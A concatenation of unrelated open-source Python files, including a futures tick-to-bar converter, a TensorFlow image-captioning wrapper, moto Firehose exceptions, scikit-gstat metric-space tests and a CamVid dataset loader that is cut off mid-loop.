'askvolume1', 'askvolume2', 'askvolume3', 'askvolume4', 'askvolume5',
'bidvolume1', 'bidvolume2', 'bidvolume3', 'bidvolume4', 'bidvolume5']
integer_fields = ['date', 'trade_date', 'time', 'volume', 'turnover', 'settle', 'oi',
'open', 'high', 'low', 'close', 'volume_total', 'turnover_total',
'askprice1', 'askprice2', 'askprice3', 'askprice4', 'askprice5',
'bidprice1', 'bidprice2', 'bidprice3', 'bidprice4', 'bidprice5',
'askvolume1', 'askvolume2', 'askvolume3', 'askvolume4', 'askvolume5',
'bidvolume1', 'bidvolume2', 'bidvolume3', 'bidvolume4', 'bidvolume5']
update_fields = ['trade_date', 'settle', 'oi',
'volume', 'turnover',
'askprice1', 'askprice2', 'askprice3', 'askprice4', 'askprice5',
'bidprice1', 'bidprice2', 'bidprice3', 'bidprice4', 'bidprice5',
'askvolume1', 'askvolume2', 'askvolume3', 'askvolume4', 'askvolume5',
'bidvolume1', 'bidvolume2', 'bidvolume3', 'bidvolume4', 'bidvolume5']
def mstime2daymillis(time):
ms = time % 1000
tmp = time / 1000
ss = tmp % 100
tmp = tmp / 100
mm = tmp % 100
tmp = tmp / 100
hh = tmp
return (( hh * 60 + mm ) * 60 + ss ) * 1000 + ms
def daymillis2mstime(time):
ms = time % 1000
tmp = time / 1000
ss = tmp % 60
tmp = tmp / 60
mm = tmp % 60
tmp = tmp / 60
hh = tmp % 60
return ((hh * 100 + mm ) * 100 + ss) * 1000 + ms
def time2daymillis(time):
return mstime2daymillis(time*1000)
def get_next_date(date):
date_str = "%d"%date
t1 = dt.datetime.strptime(date_str, "%Y%m%d")
t2 = t1 + dt.timedelta(days=1)
return t2.date().year * 10000 + t2.date().month*100 + t2.date().day
def get_pre_date(date):
date_str = "%d"%date
t1 = dt.datetime.strptime(date_str, "%Y%m%d")
t2 = t1 - dt.timedelta(days=1)
return t2.date().year * 10000 + t2.date().month*100 + t2.date().day
def get_dt_time(bar):
time = bar.get("time")
# time = daymillis2mstime(int(bar.get("time"))) / 1000
date = bar.get("date")
year = date / 10000
month = date / 100 % 100
day = date % 100
hh = time / 10000
mm = time / 100 % 100
ss = time % 100
return dt.datetime(year,month,day,hh,mm,ss,0)
class TimeUtil:
def __init__(self):
self.night_begin = time2daymillis(200000)
self.night_end = time2daymillis(30000)
self.oneday_millis = 24 * 60 * 60 * 1000
self.calendar = pd.DataFrame.from_csv('./calendar.csv',parse_dates=False).index.tolist()
aucttime = {
'SZ': [(93000,113000), (130000,150000)],
'SH': [(93000,113000), (130000,150000)],
'DCE':[(210000,23000), (90000,101500), (103000,113000),(133000,150000)],
'SHF':[(210000,23000), (90000,101500), (103000,113000),(133000,150000)],
'CZC':[(210000,23000), (90000,101500), (103000,113000),(133000,150000)],
'CFE_IF':[(93000,113000), (130000,150000)],
'CFE_BF':[(91500,113000), (130000,151500)]
}
self.aucttime = {}
for k,v in aucttime.items():
bartime = []
for pair in v:
bartime.append( (time2daymillis(pair[0]), time2daymillis(pair[1])) )
self.aucttime[k] = bartime
def daymillis_cmp(self,t1, t2):
if (t1 > self.night_begin) :
if (t2 > self.night_begin) :
if t1 > t2 :
return 1
elif t1 < t2 :
return -1
else :
return 0
else:
return -1
else :
if (t2 > self.night_begin) :
return 1
else:
if t1 > t2 :
return 1
elif t1 < t2 :
return -1
else :
return 0
def get_code_mkt(self,symbol):
code = ''
tmp = symbol.split('.')
mkt = tmp[1]
code = tmp[0]
if mkt == 'CFE':
if code.startswith('T'):
mkt += '_BF'
else:
mkt += '_IF'
return (code,mkt)
def get_begintime(self,symbol):
code, mkt = self.get_code_mkt(symbol)
tradetime = self.aucttime.get(mkt)
begintime = tradetime[0]
return begintime
def is_tradetime(self,symbol, time):
code, mkt = self.get_code_mkt(symbol)
daymillis = time
tradetime = self.aucttime.get(mkt)
for pair in tradetime:
if self.daymillis_cmp(daymillis,pair[0]) >= 0 and self.daymillis_cmp(daymillis,pair[1]) <= 0:
return True
return False
def daymillis_minus(self,t1,t2):
if t1 >= t2:
return t1-t2
else:
return t1-t2 + self.oneday_millis
def daymillis_plus(self,t1,t2):
return (t1+t2)%self.oneday_millis
class tk2bar(object):
'''
classdocs
'''
def __init__(self, user, passwd):
self.user = user
self.passwd = <PASSWORD>
self.tkreader = TkReader()
if( not self.tkreader.login(user, passwd)):
print("login failed")
return False
self.start_time = "21:00:00"
self.end_time = "15:30:00"
self.bar_map = {}
self.trade_date = 0
self.cycle = 0
self.timeutil = TimeUtil()
self.trade_time_map = {}
'''
Constructor
'''
def format_df(self, dict):
df = pd.DataFrame.from_dict(dict)
df.loc[:,'time'] = df.loc[:,'time'].astype("int64")
df.loc[:,'time'] = df.loc[:,'time'].apply(daymillis2mstime)
df.loc[:,'time'] /= 1000
df.rename(columns={'turnover':'turnover_total'}, inplace=True)
df.rename(columns={'volume':'volume_total'}, inplace=True)
df.rename(columns={'turnover_inc':'turnover'}, inplace=True)
df.rename(columns={'volume_inc':'volume'}, inplace=True)
df.loc[:,'volume'] = df.loc[:,'volume_total'] - df.loc[:,'volume_total'].shift(1)
df.loc[:,'turnover'] = df.loc[:,'turnover_total'] - df.loc[:,'turnover_total'].shift(1)
df.loc[0,'volume'] = df.loc[0,'volume_total']
df.loc[0,'turnover'] = df.loc[0,'turnover_total']
df.loc[:,'open' ] *= 10000
df.loc[:,'high' ] *= 10000
df.loc[:,'low' ] *= 10000
df.loc[:,'close' ] *= 10000
df.loc[:,'settle' ] *= 10000
df.loc[:,'askprice1' ] *= 10000
df.loc[:,'askprice2' ] *= 10000
df.loc[:,'askprice3' ] *= 10000
df.loc[:,'askprice4' ] *= 10000
df.loc[:,'askprice5' ] *= 10000
df.loc[:,'bidprice1' ] *= 10000
df.loc[:,'bidprice2' ] *= 10000
df.loc[:,'bidprice3' ] *= 10000
df.loc[:,'bidprice4' ] *= 10000
df.loc[:,'bidprice5' ] *= 10000
for field in integer_fields:
df.loc[:,field] = df.loc[:,field].astype("int64")
time = df.apply(get_dt_time, axis=1)
df.index = time
return df
def get_trade_time(self, symbol):
code,mkt = self.timeutil.get_code_mkt(symbol)
if not self.trade_time_map.has_key(mkt):
id = 0
bar_times = []
id_map = {}
trade_time = self.timeutil.aucttime.get(mkt)
for pair in trade_time:
time = self.timeutil.daymillis_plus(pair[0], self.cycle)
while self.timeutil.daymillis_cmp(time, pair[1]) <= 0:
bar_times.append(time)
id_map[time] = id
id += 1
time = self.timeutil.daymillis_plus(time, self.cycle)
self.trade_time_map[mkt] = {'id_map': id_map, 'bar_times': bar_times}
return self.trade_time_map[mkt]
def tick2bar(self, file_name, trade_dt, mkt, freq, out_dir):
if (not self.tkreader.open(file_name, "", self.start_time, self.end_time)):
print("can't open file %s " %file_name)
return False
self.trade_date = trade_dt
if trade_dt not in self.timeutil.calendar:
return False
dt_id = self.timeutil.calendar.index(trade_dt)
self.night_date = self.timeutil.calendar[dt_id-1]
self.midnight_date = get_next_date(self.night_date)
if freq == '5M':
self.cycle = 5 * 60 * 1000
elif freq == '15M':
self.cycle = 15 * 60 * 1000
else:
self.cycle = 60 * 1000
out_file = mkt + str(trade_dt) + '-' + freq + '.h5'
out_file = out_dir + out_file
i = 0
tk = self.tkreader.get_next()
while tk is not None:
self.on_tick(tk)
i += 1
if i % 50000 == 0:
print('read %d ticks'%i)
tk = self.tkreader.get_next()
data = pd.HDFStore(out_file,'a')
for k,v in self.bar_map.items():
try:
# print k
self.makeup_bars(v)
bars = v.get('bars')
df = self.format_df(bars)
data[k] = df
except Exception, e:
traceback.print_exc()
data.close()
#return data
def makeup_bars(self, bardata):
bars = bardata.get('bars')
ids = bardata.get('ids')
ids_size= len(ids)
first_id = ids[0]
last_id = ids[-1]
preclose = bardata.get('preclose')
if(first_id > 0):
for i in range(0,first_id):
bars['open'][i] = preclose
bars['high'][i] = preclose
bars['low'][i] = preclose
bars['close'][i] = preclose
if last_id < len(bars['time'])-1:
ids.append(len(bars['time'])-1)
if ids_size > 2:
for i in range(1,ids_size):
head = ids[i-1]
tail = ids[i]
if (head+1) < tail:
close = bars['close'][head]
bars['open'][head+1:tail] = close
bars['high'][head+1:tail] = close
bars['low'][head+1:tail] = close
bars['close'][head+1:tail] = close
bars['volume' ][head+1:tail] = bars['volume' ][head]
bars['turnover'][head+1:tail] = bars['turnover'][head]
bars['oi' ][head+1:tail] = bars['oi' ][head]
bars['settle' ][head+1:tail] = bars['settle' ][head]
bars['trade_date'][head+1:tail] = bars['trade_date'][head]
def new_bardata(self,bar_time_list):
last = None
first = None
bars = {}
size = len(bar_time_list)
for field in bar_fields :
if field == 'time' :
bars[field] = np.array(bar_time_list)
else:
bars[field] = np.zeros(size)
time_array = bars['time']
date_array = bars['date']
for i in range(0,len(time_array)):
if time_array[i] > self.timeutil.night_begin:
date_array[i] = self.night_date
elif time_array[i] < self.timeutil.night_end:
date_array[i] = self.midnight_date
else:
date_array[i] = self.trade_date
bars['low'] += 999999999.0
return {'bars': bars,'preclose':0.0, 'ids':[]}
def new_bar(self):
bar = {}
for field in bar_fields :
bar[field] = None
return bar
def get_bartime(self, daymillis):
bartime = (daymillis / self.cycle + 1) * self.cycle
return bartime
def on_tick(self, tk):
time = tk['time']
symbol = tk['symbol']
# print(time,symbol,tk['volume'],tk['turnover'])
daymillis = mstime2daymillis(time)
barmillis = self.get_bartime(daymillis)
trade_time = self.get_trade_time(symbol)
id_map = trade_time['id_map']
bar_time_list = trade_time['bar_times']
if not id_map.has_key(barmillis) :
return
if not self.timeutil.is_tradetime(symbol, daymillis):
return
if not self.bar_map.has_key(symbol):
self.bar_map[symbol] = self.new_bardata(bar_time_list)
id = id_map.get(barmillis)
bardata = self.bar_map.get(symbol)
bardata['preclose'] = tk['preclose']
barlist = bardata.get('bars')
if len(bardata['ids']) == 0 :
bardata['ids'].append(id)
elif bardata['ids'][-1] < id:
bardata['ids'].append(id)
last = tk['last']
if (barlist['open'][id] < 0.000001):
barlist['open'][id] = last
if barlist['high'][id] < last:
barlist['high'][id] = last
if barlist['low'][id] > last:
barlist['low'][id] = last
barlist['close'][id] = last
for field in update_fields:
if tk.has_key(field):
barlist[field][id] = tk[field]
if __name__ == '__main__':
user = "phone number"
passwd = "<PASSWORD>"
convert = tk2bar(user,passwd)
try :
convert.tick2bar('./SHF20171218.tk', 20171218, 'SHF','1M','./')
except Exception, e:
traceback.print_exc()
raise e
|
tika-parsers/src/main/resources/org/apache/tika/parser/captioning/tf/model_wrapper.py | dedabob/tika | 1,299 | 12664522 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os.path
import tensorflow as tf
from tensorflow.contrib.slim.python.slim.nets.inception_v3 import inception_v3_base
slim = tf.contrib.slim
class ModelWrapper(object):
"""
Model wrapper class to perform image captioning with a ShowAndTellModel
"""
def __init__(self):
super(ModelWrapper, self).__init__()
def build_graph(self, checkpoint_path):
"""Builds the inference graph"""
tf.logging.info("Building model.")
ShowAndTellModel().build()
saver = tf.train.Saver()
return self._create_restore_fn(checkpoint_path, saver)
def _create_restore_fn(self, checkpoint_path, saver):
"""Creates a function that restores a model from checkpoint file"""
if tf.gfile.IsDirectory(checkpoint_path):
checkpoint_path = tf.train.latest_checkpoint(checkpoint_path)
if not checkpoint_path:
raise ValueError("No checkpoint file found in: %s" % checkpoint_path)
def _restore_fn(sess):
tf.logging.info("Loading model from checkpoint: %s", checkpoint_path)
saver.restore(sess, checkpoint_path)
tf.logging.info("Successfully loaded checkpoint: %s",
os.path.basename(checkpoint_path))
return _restore_fn
def feed_image(self, sess, encoded_image):
initial_state = sess.run(fetches="lstm/initial_state:0",
feed_dict={"image_feed:0": encoded_image})
return initial_state
def inference_step(self, sess, input_feed, state_feed):
softmax_output, state_output = sess.run(
fetches=["softmax:0", "lstm/state:0"],
feed_dict={
"input_feed:0": input_feed,
"lstm/state_feed:0": state_feed,
})
return softmax_output, state_output
class ShowAndTellModel(object):
"""
Image captioning implementation based on the paper,
"Show and Tell: A Neural Image Caption Generator"
<NAME>, <NAME>, <NAME>, <NAME>
For more details, please visit : http://arxiv.org/abs/1411.4555
"""
def __init__(self):
# scale used to initialize model variables
self.initializer_scale = 0.08
# dimensions of Inception v3 input images
self.image_height = 299
self.image_width = 299
# LSTM input and output dimensionality, respectively
self.embedding_size = 512
self.num_lstm_units = 512
# number of unique words in the vocab (plus 1, for <UNK>)
# the default value is larger than the expected actual vocab size to allow
# for differences between tokenizer versions used in preprocessing, there is
# no harm in using a value greater than the actual vocab size, but using a
# value less than the actual vocab size will result in an error
self.vocab_size = 12000
# reader for the input data
self.reader = tf.TFRecordReader()
# to match the "Show and Tell" paper we initialize all variables with a
# random uniform initializer
self.initializer = tf.random_uniform_initializer(
minval=-self.initializer_scale,
maxval=self.initializer_scale)
# a float32 Tensor with shape [batch_size, height, width, channels]
self.images = None
# an int32 Tensor with shape [batch_size, padded_length]
self.input_seqs = None
# an int32 Tensor with shape [batch_size, padded_length]
self.target_seqs = None
# an int32 0/1 Tensor with shape [batch_size, padded_length]
self.input_mask = None
# a float32 Tensor with shape [batch_size, embedding_size]
self.image_embeddings = None
# a float32 Tensor with shape [batch_size, padded_length, embedding_size]
self.seq_embeddings = None
# collection of variables from the inception submodel
self.inception_variables = []
# global step Tensor
self.global_step = None
def process_image(self, encoded_image, resize_height=346, resize_width=346, thread_id=0):
"""Decodes and processes an image string"""
# helper function to log an image summary to the visualizer. Summaries are
# only logged in thread 0
def image_summary(name, img):
if not thread_id:
tf.summary.image(name, tf.expand_dims(img, 0))
# decode image into a float32 Tensor of shape [?, ?, 3] with values in [0, 1)
with tf.name_scope("decode", values=[encoded_image]):
image = tf.image.decode_jpeg(encoded_image, channels=3)
image = tf.image.convert_image_dtype(image, dtype=tf.float32)
image_summary("original_image", image)
# resize image
assert (resize_height > 0) == (resize_width > 0)
if resize_height:
image = tf.image.resize_images(image,
size=[resize_height, resize_width],
method=tf.image.ResizeMethod.BILINEAR)
# central crop, assuming resize_height > height, resize_width > width
image = tf.image.resize_image_with_crop_or_pad(image, self.image_height, self.image_width)
image_summary("resized_image", image)
image_summary("final_image", image)
# rescale to [-1,1] instead of [0, 1]
image = tf.subtract(image, 0.5)
image = tf.multiply(image, 2.0)
return image
def build_inputs(self):
"""Input prefetching, preprocessing and batching"""
image_feed = tf.placeholder(dtype=tf.string, shape=[], name="image_feed")
input_feed = tf.placeholder(dtype=tf.int64,
shape=[None], # batch_size
name="input_feed")
# process image and insert batch dimensions
images = tf.expand_dims(self.process_image(image_feed), 0)
input_seqs = tf.expand_dims(input_feed, 1)
# no target sequences or input mask in inference mode
target_seqs = None
input_mask = None
self.images = images
self.input_seqs = input_seqs
self.target_seqs = target_seqs
self.input_mask = input_mask
def build_image_embeddings(self):
"""Builds the image model(Inception V3) subgraph and generates image embeddings"""
# parameter initialization
batch_norm_params = {
"is_training": False,
"trainable": False,
# decay for the moving averages
"decay": 0.9997,
# epsilon to prevent 0s in variance
"epsilon": 0.001,
# collection containing the moving mean and moving variance
"variables_collections": {
"beta": None,
"gamma": None,
"moving_mean": ["moving_vars"],
"moving_variance": ["moving_vars"],
}
}
stddev = 0.1,
dropout_keep_prob = 0.8
with tf.variable_scope("InceptionV3", "InceptionV3", [self.images]) as scope:
with slim.arg_scope(
[slim.conv2d, slim.fully_connected],
weights_regularizer=None,
trainable=False):
with slim.arg_scope(
[slim.conv2d],
weights_initializer=tf.truncated_normal_initializer(stddev=stddev),
activation_fn=tf.nn.relu,
normalizer_fn=slim.batch_norm,
normalizer_params=batch_norm_params):
net, end_points = inception_v3_base(self.images, scope=scope)
with tf.variable_scope("logits"):
shape = net.get_shape()
net = slim.avg_pool2d(net, shape[1:3], padding="VALID", scope="pool")
net = slim.dropout(
net,
keep_prob=dropout_keep_prob,
is_training=False,
scope="dropout")
net = slim.flatten(net, scope="flatten")
# add summaries
for v in end_points.values():
tf.contrib.layers.summaries.summarize_activation(v)
self.inception_variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope="InceptionV3")
# map inception output(net) into embedding space
with tf.variable_scope("image_embedding") as scope:
image_embeddings = tf.contrib.layers.fully_connected(
inputs=net,
num_outputs=self.embedding_size,
activation_fn=None,
weights_initializer=self.initializer,
biases_initializer=None,
scope=scope)
# save the embedding size in the graph
tf.constant(self.embedding_size, name="embedding_size")
self.image_embeddings = image_embeddings
def build_seq_embeddings(self):
"""Builds the input sequence embeddings"""
with tf.variable_scope("seq_embedding"), tf.device("/cpu:0"):
embedding_map = tf.get_variable(
name="map",
shape=[self.vocab_size, self.embedding_size],
initializer=self.initializer)
seq_embeddings = tf.nn.embedding_lookup(embedding_map, self.input_seqs)
self.seq_embeddings = seq_embeddings
def build_model(self):
# this LSTM cell has biases and outputs tanh(new_c) * sigmoid(o), but the
# modified LSTM in the "Show and Tell" paper has no biases and outputs
# new_c * sigmoid(o).
lstm_cell = tf.contrib.rnn.BasicLSTMCell(
num_units=self.num_lstm_units, state_is_tuple=True)
with tf.variable_scope("lstm", initializer=self.initializer) as lstm_scope:
# feed the image embeddings to set the initial LSTM state
zero_state = lstm_cell.zero_state(
batch_size=self.image_embeddings.get_shape()[0], dtype=tf.float32)
_, initial_state = lstm_cell(self.image_embeddings, zero_state)
# allow the LSTM variables to be reused
lstm_scope.reuse_variables()
# because this is inference mode,
# use concatenated states for convenient feeding and fetching
tf.concat(axis=1, values=initial_state, name="initial_state")
# placeholder for feeding a batch of concatenated states
state_feed = tf.placeholder(dtype=tf.float32,
shape=[None, sum(lstm_cell.state_size)],
name="state_feed")
state_tuple = tf.split(value=state_feed, num_or_size_splits=2, axis=1)
# run a single LSTM step
lstm_outputs, state_tuple = lstm_cell(
inputs=tf.squeeze(self.seq_embeddings, axis=[1]),
state=state_tuple)
# concatentate the resulting state
tf.concat(axis=1, values=state_tuple, name="state")
# stack batches vertically
lstm_outputs = tf.reshape(lstm_outputs, [-1, lstm_cell.output_size])
with tf.variable_scope("logits") as logits_scope:
logits = tf.contrib.layers.fully_connected(
inputs=lstm_outputs,
num_outputs=self.vocab_size,
activation_fn=None,
weights_initializer=self.initializer,
scope=logits_scope)
tf.nn.softmax(logits, name="softmax")
def setup_global_step(self):
"""Sets up the global step Tensor"""
global_step = tf.Variable(
initial_value=0,
name="global_step",
trainable=False,
collections=[tf.GraphKeys.GLOBAL_STEP, tf.GraphKeys.GLOBAL_VARIABLES])
self.global_step = global_step
def build(self):
self.build_inputs()
self.build_image_embeddings()
self.build_seq_embeddings()
self.build_model()
self.setup_global_step()
|
tests/test_ridgereg.py | GabrielWen/spartan | 156 | 12664528 | <filename>tests/test_ridgereg.py
from spartan.examples import ridge_regression
import test_common
from test_common import millis
from spartan import expr, util
import time
N_EXAMPLES = 100
N_DIM = 3
ITERATION = 10
class TestRidgeRegression(test_common.ClusterTest):
def test_ridgereg(self):
ridge_regression.run(N_EXAMPLES, N_DIM, ITERATION)
def benchmark_ridgereg(ctx, timer):
print "#worker:", ctx.num_workers
#N_EXAMPLES = 100000000 * ctx.num_workers
N_EXAMPLES = 90000000 * ctx.num_workers
x = expr.rand(N_EXAMPLES, N_DIM)
y = expr.rand(N_EXAMPLES, 1)
start = time.time()
ridge_regression.ridge_regression(x, y, 1, ITERATION)
total = time.time() - start
util.log_warn("time cost : %s s" % (total*1.0/ITERATION,))
if __name__ == '__main__':
test_common.run(__file__)
|
moto/firehose/exceptions.py | oakbramble/moto | 5,460 | 12664536 | <gh_stars>1000+
"""Exceptions raised by the Firehose service."""
from moto.core.exceptions import JsonRESTError
class ConcurrentModificationException(JsonRESTError):
"""Existing config has a version ID that does not match given ID."""
code = 400
def __init__(self, message):
super().__init__("ConcurrentModificationException", message)
class InvalidArgumentException(JsonRESTError):
"""The specified input parameter has a value that is not valid."""
code = 400
def __init__(self, message):
super().__init__("InvalidArgumentException", message)
class LimitExceededException(JsonRESTError):
"""You have already reached the limit for a requested resource."""
code = 400
def __init__(self, message):
super().__init__("LimitExceededException", message)
class ResourceInUseException(JsonRESTError):
"""The resource is already in use and not available for this operation."""
code = 400
def __init__(self, message):
super().__init__("ResourceInUseException", message)
class ResourceNotFoundException(JsonRESTError):
"""The specified resource could not be found."""
code = 400
def __init__(self, message):
super().__init__("ResourceNotFoundException", message)
class ValidationException(JsonRESTError):
"""The tag key or tag value is not valid."""
code = 400
def __init__(self, message):
super().__init__("ValidationException", message)
|
midi_ddsp/utils/file_utils.py | magenta/midi-ddsp | 169 | 12664565 | """Utility functions for file io and file path reading."""
# Copyright 2021 The DDSP Authors.
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Lint as: python3
import os
import shutil
import pickle
import json
def get_folder_name(path, num=1):
"""
Get the name of the folder n levels above the given path.
Example: a/b/c/d.txt, num=1 -> c, num=2 -> b, ...
Args:
path: a file path.
num: the number of upper directories.
Returns: the folder name for that level.
"""
for _ in range(num):
path = os.path.dirname(path)
return os.path.basename(path)
def copy_file_to_folder(file_path, dst_dir):
save_path = os.path.join(dst_dir, os.path.basename(file_path))
shutil.copy(file_path, save_path)
def pickle_dump(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f)
f.close()
def pickle_load(path):
with open(path, 'rb') as f:
data = pickle.load(f)
f.close()
return data
def json_dump(data_json, json_save_path):
with open(json_save_path, 'w') as f:
json.dump(data_json, f)
f.close()
def json_load(json_path):
with open(json_path, 'r') as f:
data = json.load(f)
f.close()
return data
def write_str_lines(save_path, lines):
lines = [l + '\n' for l in lines]
with open(save_path, 'w', encoding='utf-8') as f:
f.writelines(lines)
|
skgstat/tests/test_metric_space.py | mmaelicke/scikit-gstat | 141 | 12664616 | import pytest
import numpy as np
import skgstat as skg
import scipy
# produce a random dataset
np.random.seed(42)
rcoords = np.random.gamma(40, 10, size=(500, 2))
np.random.seed(42)
rvals = np.random.normal(10, 4, 500)
def test_invalid_dist_func():
# instantiate metrix space
ms = skg.MetricSpace(rcoords, dist_metric='euclidean')
with pytest.raises(AttributeError) as e:
skg.Variogram(ms, rvals, dist_func='cityblock')
assert 'Distance metric' in e.value
def test_sparse_matrix_no_warning():
# make a really sparse matrix
sparse = skg.MetricSpace(rcoords, max_dist=5)
# call triangular_distance_matrix without warning
V = skg.Variogram(sparse, rvals)
V.triangular_distance_matrix
def test_dense_matrix_warning():
dense = skg.MetricSpace(rcoords)
# check the warning
with pytest.raises(RuntimeWarning) as w:
V = skg.Variogram(dense, rvals)
V.triangular_distance_matrix
assert 'Only available' in w.value
def test_unknown_metric():
with pytest.raises(ValueError) as e:
skg.MetricSpace(rcoords, dist_metric='foobar')
assert 'Unknown Distance Metric:' in e.value
def test_tree_non_euklidean():
with pytest.raises(ValueError) as e:
ms = skg.MetricSpace(rcoords, 'cityblock')
ms.tree
assert 'can only be constructed' in e.value
def test_metric_pair_metrix():
c1 = np.random.gamma(100, 4, (300, 2))
c2 = np.random.gamma(50, 5, (100, 2))
ms1 = skg.MetricSpace(c1, dist_metric='cityblock')
ms2 = skg.MetricSpace(c2, dist_metric='euclidean')
with pytest.raises(ValueError) as e:
skg.MetricSpacePair(ms1, ms2)
assert 'same distance metric' in e.value
def test_metric_pair_max_dist():
c1 = np.random.gamma(100, 4, (300, 2))
c2 = np.random.gamma(50, 5, (100, 2))
ms1 = skg.MetricSpace(c1, max_dist=50)
ms2 = skg.MetricSpace(c2, max_dist=400)
with pytest.raises(ValueError) as e:
skg.MetricSpacePair(ms1, ms2)
assert 'same max_dist' in e.value
def test_raster_metric():
# Generate a gridded dataset
shape = (100, 100)
np.random.seed(42)
vals = np.random.normal(0, 1, size=shape)
# Coordinates
x = np.arange(0, shape[0])
y = np.arange(0, shape[1])
xx, yy = np.meshgrid(x, y)
# Flatten everything because we don't care about the 2D at this point
coords = np.dstack((xx.flatten(), yy.flatten())).squeeze()
vals = vals.flatten()
# Run the computation
rems = skg.RasterEquidistantMetricSpace(coords, shape=shape, extent=(x[0],x[-1],y[0],y[-1]), samples=10, runs=10,
rnd=42, verbose=True)
# Minimal check of the output
assert rems.max_dist == pytest.approx(140,rel=0.01)
assert rems.res == pytest.approx(1, rel=0.0001)
assert isinstance(rems.dists, scipy.sparse.csr.csr_matrix)
assert rems.dists.shape == (10000, 10000)
# Check the random state provides the same final center
assert all(rems._centers[-1] == np.array([62, 52]))
# Check the interface with a Variogram object works
V = skg.Variogram(rems, vals)
assert V.bin_count is not None
# Check the variogram is always the same with the random state given
assert V.experimental[0] == pytest.approx(0.89,0.01)
# Check that the routines are robust to very few data points in the grid (e.g., from nodata values)
coords_sub = coords[0::1000]
vals_sub = vals[0::1000]
rems_sub = skg.RasterEquidistantMetricSpace(coords_sub, shape=shape, extent=(x[0],x[-1],y[0],y[-1]), samples=100, runs=10,
rnd=42)
V = skg.Variogram(rems_sub, vals_sub)
# Check with a single isolated point possibly being used as center
coords_sub = np.concatenate(([coords[0]], coords[-10:]))
vals_sub = np.concatenate(([vals[0]], vals[-10:]))
rems_sub = skg.RasterEquidistantMetricSpace(coords_sub, shape=shape, extent=(x[0],x[-1],y[0],y[-1]), samples=100, runs=11,
rnd=42)
V = skg.Variogram(rems_sub, vals_sub)
|
tensorpack/dataflow/dataset/camvid.py | Bhaskers-Blu-Org2/petridishnn | 121 | 12664620 | from ..base import RNGDataFlow
from ...utils import logger,fs
import os
import numpy as np
def load_data_from_npzs(fnames):
if not isinstance(fnames, list):
fnames = [fnames]
Xs = []
Ys = []
for fname in fnames:
d = np.load(fname)
logger.info('Loading from {}'.format(fname))
X, Y = (d['X'], d['Y'])
Xs.append(X)
Ys.append(Y)
return np.stack(X), np.stack(Y)
class Camvid(RNGDataFlow):
name = 'camvid'
non_void_nclasses = 11
_void_labels = [11]
# optional arguments
data_shape = (360, 480, 3)
mean = [0.39068785, 0.40521392, 0.41434407]
std = [0.29652068, 0.30514979, 0.30080369]
_cmap = {
0: (128, 128, 128), # sky
1: (128, 0, 0), # building
2: (192, 192, 128), # column_pole
3: (128, 64, 128), # road
4: (0, 0, 192), # sidewalk
5: (128, 128, 0), # Tree
6: (192, 128, 128), # SignSymbol
7: (64, 64, 128), # Fence
8: (64, 0, 128), # Car
9: (64, 64, 0), # Pedestrian
10: (0, 128, 192), # Bicyclist
11: (0, 0, 0)} # Void
_mask_labels = {0: 'sky', 1: 'building', 2: 'column_pole', 3: 'road',
4: 'sidewalk', 5: 'tree', 6: 'sign', 7: 'fence', 8: 'car',
9: 'pedestrian', 10: 'byciclist', 11: 'void'}
# frequency and weight of each class (including void)
class_freq = np.array([ 0.16845114, 0.23258652, 0.00982927, 0.31658215, 0.0448627,
0.09724055, 0.01172954, 0.01126809, 0.05865686, 0.00639231, 0.00291665, 0.03948423])
class_weight = sorted(class_freq)[len(class_freq)//2] / class_freq
#class_weight = np.array([ 0.49470329, 0.35828961, 8.47807568, 0.26322815,
# 1.8575192 , 0.85698135, 7.10457224, 7.39551774,
# 1.42069214, 13.03649617, 28.57158304, 2.11054735])
def __init__(self, which_set, shuffle=True, pixel_z_normalize=True, data_dir=None,
is_label_one_hot=False,
slide_all=False, slide_window_size=224, void_overlap=False):
"""
which_set : one of train, val, test, trainval
shuffle:
data_dir: <data_dir> should contain train.npz, val.npz, test.npz
"""
self.shuffle = shuffle
self.pixel_z_normalize = pixel_z_normalize
self.is_label_one_hot = is_label_one_hot
self.void_overlap = void_overlap
if data_dir is None:
data_dir = fs.get_dataset_path('camvid')
assert os.path.exists(data_dir)
for set_name in ['train', 'val', 'test']:
assert os.path.exists(os.path.join(data_dir, '{}.npz'.format(set_name)))
assert which_set in ['train', 'val', 'test', 'trainval'],which_set
if which_set == 'train':
load_fns = ['train']
elif which_set == 'val':
load_fns = ['val']
elif which_set == 'test':
load_fns = ['test']
else: #if which_set == 'trainval':
load_fns = ['train', 'val']
# These npz are assumed to have NHWC format for image, and NHW for label
load_fns = map(lambda fn : os.path.join(data_dir, '{}.npz'.format(fn)), load_fns)
self.X, self.Y = load_data_from_npzs(load_fns)
assert self.X.dtype == 'uint8'
self.slide_window_size = slide_window_size
self.slide_all = slide_all
self.slide_all_size =None
def get_data(self):
idxs = np.arange(len(self.X))
if self.shuffle:
self.rng.shuffle(idxs)
for k in idxs:
X = np.asarray(self.X[k], dtype=np.float32) / 255.0
Y = self.Y[k]
H,W = (X.shape[0], X.shape[1])
void = Camvid._void_labels[0]
if self.is_label_one_hot:
K = Camvid.non_void_nclasses
Y_tmp = np.zeros((H,W,K),dtype=np.float32)
mask = (Y.reshape([-1]) < K)
Y_tmp.reshape([-1,K])[np.arange(H*W)[mask], Y.reshape([-1])[mask]] = 1.0
Y = Y_tmp
void = np.zeros(K)
if self.pixel_z_normalize:
X = (X - Camvid.mean) / Camvid.std
if not self.slide_all:
# do not slide all windows
yield [X, Y]
else:
# slide all windows
side = self.slide_window_size
n_h = H // side + int(H % side != 0)
n_w = W // side + int(W % side != 0)
for hi in range(n_h):
